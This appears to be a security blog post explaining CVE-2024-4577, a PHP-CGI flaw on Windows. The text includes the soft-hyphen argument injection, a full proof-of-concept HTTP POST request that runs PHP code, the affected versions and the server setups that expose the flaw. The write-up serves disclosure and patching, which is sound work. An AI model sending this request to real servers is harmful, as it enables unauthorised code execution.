RCE Unleashed: CVE-2024-4577 in XAMPP’s PHP CGI
About CVE-2024-4577 PHP-CGI Vulnerability
The vulnerability CVE-2024-4577 enables attackers to carry out remote execution of malicious commands on Windows servers that operate a PHP system. This vulnerability affects the PHP-CGI script engine regardless of PHP's setup mode. It impacts IIS web servers and XAMPP servers, both of which are widely-used platforms for hosting web applications. With a CVSS score of 9.8, this vulnerability is of critical severity.
Exploit via Best-Fit Encoding
This bug affects PHP when running in CGI mode, where the web server processes HTTP requests and passes them to a PHP script. For instance, a request like http://host/cgi.php?foo=bar might be executed as php.exe cgi.php foo=bar.
This process can lead to command injection, requiring careful input handling and sanitization. However, attackers can exploit a loophole involving Unicode characters converting into ASCII.
For example, consider two php.exe commands—one malicious and one safe. While they look the same, a hex editor shows the difference: the safe command uses a normal dash (0x2D), and the malicious one uses a “soft hyphen” (0xAD). These characters appear similar but have different meanings to the OS. Apache escapes the normal dash but not the soft hyphen, allowing attackers to bypass security and run harmful commands.
How is it exploited?
To achieve remote code execution (RCE), the following arguments need to be injected:
-d allow_url_include=1 -d auto_prepend_file=php://input
This command makes PHP process input from our HTTP request body. A "soft hyphen" (0xAD) can be used instead of the normal hyphen to test if it bypasses escaping:
POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
phpinfo();
?>
If successful, we get a phpinfo page, confirming RCE.
To automate this testing, users can check out this script on GitHub
Affected Versions:
- 8.3 < 8.3.8
- 8.2 < 8.2.20
- 8.1 < 8.1.29
- 8.0
- 7 and 5 (which are no longer supported)
Conditions Required for Exploiting CVE-2024-4577
Attackers can exploit CVE-2024-4577 under specific conditions. Common scenarios include:
- Copying Executables to CGI-Bin Directory:
- Placing php.exe or php-cgi.exe in the /cgi-bin/ directory, making them accessible via the web server.
- Exposing PHP Directory via ScriptAlias Directive:
- Configuring the server to expose the PHP directory using the ScriptAlias directive. For example:
- ScriptAlias /php-cgi/ "C:/xampp/php/"
Conclusion
CVE-2024-4577 is a significant risk to PHP systems, particularly on IIS and XAMPP servers. Given its simplicity and PHP and XAMPP’s popularity, it’s a prime target for attackers. Admins and developers must apply patches or upgrades swiftly.
